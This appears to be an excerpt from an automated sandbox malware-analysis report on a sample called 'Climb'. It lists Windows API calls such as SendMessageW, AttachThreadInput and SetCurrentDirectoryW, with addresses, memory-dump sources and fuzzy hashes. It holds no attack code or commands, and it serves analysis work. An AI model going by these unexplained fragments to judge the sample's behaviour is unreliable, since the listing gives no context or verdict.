                                                                                                                                                                          • Instruction Fuzzy Hash: 1D51D132A0011AABCB14DF68C9509FEB7A5BF65364F204269F866E7381EB71DE40C790
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32 ref: 001341D1
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 001341DC
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00150B44,?), ref: 00134236
                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 001342A9
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00134341
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00134393
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                          • Opcode ID: d93f46928c568af7949893e808362a4e08c3e009eb26c3e7307cd526167e88fd
                                                                                                                                                                          • Instruction ID: 87a514b0fb86004e12179c0f5f3c73cd36b8c035e4364e32dfe30b045ffbe005
                                                                                                                                                                          • Opcode Fuzzy Hash: d93f46928c568af7949893e808362a4e08c3e009eb26c3e7307cd526167e88fd
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D618D716087119FD710DF64D889BABBBE8EF49714F004919F985AB2A1C770FD84CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00128C9C
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00128CAC
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00128CB8
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00128D55
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128D69
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128D9B
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00128DD1
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128DDA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                          • Opcode ID: 9c639991b0f34bd6964fc64e4cf55d8a1e8457728f2edc2a50ff2aedb1d64960
                                                                                                                                                                          • Instruction ID: d3bf1cfb832f79983ee3b1aebc752097d28cf49ece36c2c71e3243512455a3e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c639991b0f34bd6964fc64e4cf55d8a1e8457728f2edc2a50ff2aedb1d64960
                                                                                                                                                                          • Instruction Fuzzy Hash: 41616A725043159FDB10EF60D8449EEB3E8FF99310F04482EF99997252EB31E955CBA2
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMenu.USER32 ref: 00144715
                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00144724
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001447AC
                                                                                                                                                                          • IsMenu.USER32(?), ref: 001447C0
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 001447CA
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001447F7
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 001447FF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                          • Opcode ID: ab672e3c329f4ab0daaffccffa8a0351221770de4683bded04eb859c611ff9a8
                                                                                                                                                                          • Instruction ID: 3af5269169ec4b4b6f012416a74e38e345c0f172e3dc3849f115f9c53df05990
                                                                                                                                                                          • Opcode Fuzzy Hash: ab672e3c329f4ab0daaffccffa8a0351221770de4683bded04eb859c611ff9a8
                                                                                                                                                                          • Instruction Fuzzy Hash: 554169B9A0120AAFDF14CFA4E884FAA7BB5FF4A314F144028FA4597361C770A910CF50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 001128B1
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 001128BC
                                                                                                                                                                          • GetParent.USER32 ref: 001128D8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001128DB
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 001128E4
                                                                                                                                                                          • GetParent.USER32(?), ref: 001128F8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001128FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: e60fd8b32847794a42a32d8f3c5205c9889b12fcea5530644948dda756599e55
                                                                                                                                                                          • Instruction ID: 5f0db6a18ddd61535ababf7614b7d9f9297296dabd4fd7578e7bb719c324ace5
                                                                                                                                                                          • Opcode Fuzzy Hash: e60fd8b32847794a42a32d8f3c5205c9889b12fcea5530644948dda756599e55
                                                                                                                                                                          • Instruction Fuzzy Hash: FD21F974E00118BFCF08AFA4DC85DEEBBB8EF06350F004126F961932A1DB794859DB60
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333
                                                                                                                                                                            • Part of subcall function 001145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00114620
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00112990
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 0011299B
                                                                                                                                                                          • GetParent.USER32 ref: 001129B7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001129BA
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 001129C3
                                                                                                                                                                          • GetParent.USER32(?), ref: 001129D7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 001129DA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: 10a660241c02fc8cfdc9fda1564af69c5c0dd88001c8192527c3e6f4c4d8cfa7
                                                                                                                                                                          • Instruction ID: cbabe8ceeb23bc1e8fca281e5e5f04da2b02a54bd5d0bac366726ff29d470c63
                                                                                                                                                                          • Opcode Fuzzy Hash: 10a660241c02fc8cfdc9fda1564af69c5c0dd88001c8192527c3e6f4c4d8cfa7
                                                                                                                                                                          • Instruction Fuzzy Hash: 6021D875E00128BBCF05AFA4DC45EFEBBB8EF05344F004066F951971A1D7794999DB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00144539
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0014453C
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00144563
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00144586
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001445FE
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00144648
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00144663
                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0014467E
                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00144692
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001446AF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                          • Opcode ID: 4d2f3dddc30fd2adc5d82011d23f3a3bf20795058391f2042c0ceeea79dda8a2
                                                                                                                                                                          • Instruction ID: eda79d2d11dc481d071d92c4751c40e52615f27e2e2094dda296d524b6497616
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d2f3dddc30fd2adc5d82011d23f3a3bf20795058391f2042c0ceeea79dda8a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 45618A75A00258AFDB11DFA8CC81FEE77B8EF0A704F10015AFA04E72A1C774AA46DB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0011BB18
                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB2C
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0011BB33
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB42
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0011BB54
                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB6D
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BB7F
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBC4
                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBD9
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0011ABA8,?,00000001), ref: 0011BBE4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                          • Opcode ID: 92dc3e8b062de3fc4f4897ea03fe0b86f6c6cbc6e8fabf506afabfc7cd567363
                                                                                                                                                                          • Instruction ID: 1035bb0c8a875f4380f4206a44c929b7a95c8e55f4bb6d0d750a7e407f86799a
                                                                                                                                                                          • Opcode Fuzzy Hash: 92dc3e8b062de3fc4f4897ea03fe0b86f6c6cbc6e8fabf506afabfc7cd567363
                                                                                                                                                                          • Instruction Fuzzy Hash: C331C17590C215AFDB159B14ECC4FEA37A9EB05312F114025FA05C79A0DB7499C0CB28
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 000E3007
                                                                                                                                                                            • Part of subcall function 000E2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4), ref: 000E2D4E
                                                                                                                                                                            • Part of subcall function 000E2D38: GetLastError.KERNEL32(00181DC4,?,000EDB51,00181DC4,00000000,00181DC4,00000000,?,000EDB78,00181DC4,00000007,00181DC4,?,000EDF75,00181DC4,00181DC4), ref: 000E2D60
                                                                                                                                                                          • _free.LIBCMT ref: 000E3013
                                                                                                                                                                          • _free.LIBCMT ref: 000E301E
                                                                                                                                                                          • _free.LIBCMT ref: 000E3029
                                                                                                                                                                          • _free.LIBCMT ref: 000E3034
                                                                                                                                                                          • _free.LIBCMT ref: 000E303F
                                                                                                                                                                          • _free.LIBCMT ref: 000E304A
                                                                                                                                                                          • _free.LIBCMT ref: 000E3055
                                                                                                                                                                          • _free.LIBCMT ref: 000E3060
                                                                                                                                                                          • _free.LIBCMT ref: 000E306E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 9cdeb06b95486c0158290319639278db72b401703f9d516a1b2d01cb3b7c2ffa
                                                                                                                                                                          • Instruction ID: 9429e745bfe90b979a0113ce4c093d5a74fb0079800b1b5b9fce8bca0766c644
                                                                                                                                                                          • Opcode Fuzzy Hash: 9cdeb06b95486c0158290319639278db72b401703f9d516a1b2d01cb3b7c2ffa
                                                                                                                                                                          • Instruction Fuzzy Hash: EE11B67610414CBFCB01EF96CC42CDD3BA9EF05350B8144A5FA08AF223DA31EE619B91
                                                                                                                                                                          APIs
                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000B2AF9
                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 000B2B98
                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 000B2D7D
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 000F3A1B
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 000F3A80
                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F3AAD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                          • String ID: close all
                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                          • Opcode ID: b0c1338f367768e5fce4c06e6eaa7f456d0c4867178dc618fdf09f98d8645cfb
                                                                                                                                                                          • Instruction ID: 85f9e992924daab61264f88331c0ccb2d9e71d36d02b2ebef440491b1f04ae61
                                                                                                                                                                          • Opcode Fuzzy Hash: b0c1338f367768e5fce4c06e6eaa7f456d0c4867178dc618fdf09f98d8645cfb
                                                                                                                                                                          • Instruction Fuzzy Hash: CED18F31701212DFCB29EF15D859BA9F7A0BF04710F1142ADEA4AAB662CB31ED52DF40
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001289F2
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128A06
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00128A30
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00128A4A
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128A5C
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00128AA5
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00128AF5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 769691225-438819550
                                                                                                                                                                          • Opcode ID: 1b77d592479999c4fc517359eeae9636c8b3480871b3636320681b3f19f4dbca
                                                                                                                                                                          • Instruction ID: 2c3582ed25e7ddf06a79e85c385aae093da1bd57cf8e9ca52a2fdae8ec2830e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b77d592479999c4fc517359eeae9636c8b3480871b3636320681b3f19f4dbca
                                                                                                                                                                          • Instruction Fuzzy Hash: B481BF729053249FCB24EF14D444ABAB3E8BF94314F58482EF885D7251EF34E995CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 000B74D7
                                                                                                                                                                            • Part of subcall function 000B7567: GetClientRect.USER32(?,?), ref: 000B758D
                                                                                                                                                                            • Part of subcall function 000B7567: GetWindowRect.USER32(?,?), ref: 000B75CE
                                                                                                                                                                            • Part of subcall function 000B7567: ScreenToClient.USER32(?,?), ref: 000B75F6
                                                                                                                                                                          • GetDC.USER32 ref: 000F6083
                                                                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000F6096
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 000F60A4
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 000F60B9
                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 000F60C1
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000F6152
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                          • String ID: U
                                                                                                                                                                          • API String ID: 4009187628-3372436214
                                                                                                                                                                          • Opcode ID: b6beea3f0d57678946cd2f028d48ffc807ebaf5e759d5e955df6fa23ba8ad084
                                                                                                                                                                          • Instruction ID: b53cbfa6a8252d4aa78aa036888b16b4dc55beb5e8c92e915c829a3533f4fc17
                                                                                                                                                                          • Opcode Fuzzy Hash: b6beea3f0d57678946cd2f028d48ffc807ebaf5e759d5e955df6fa23ba8ad084
                                                                                                                                                                          • Instruction Fuzzy Hash: BD71B134500209EFCF75CF64CC84AFA7BB5FF49315F284669EE555A566CB328880EB50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0
                                                                                                                                                                            • Part of subcall function 000B19CD: GetCursorPos.USER32(?), ref: 000B19E1
                                                                                                                                                                            • Part of subcall function 000B19CD: ScreenToClient.USER32(00000000,?), ref: 000B19FE
                                                                                                                                                                            • Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000001), ref: 000B1A23
                                                                                                                                                                            • Part of subcall function 000B19CD: GetAsyncKeyState.USER32(00000002), ref: 000B1A3D
                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001495C7
                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 001495CD
                                                                                                                                                                          • ReleaseCapture.USER32 ref: 001495D3
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0014966E
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00149681
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0014975B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
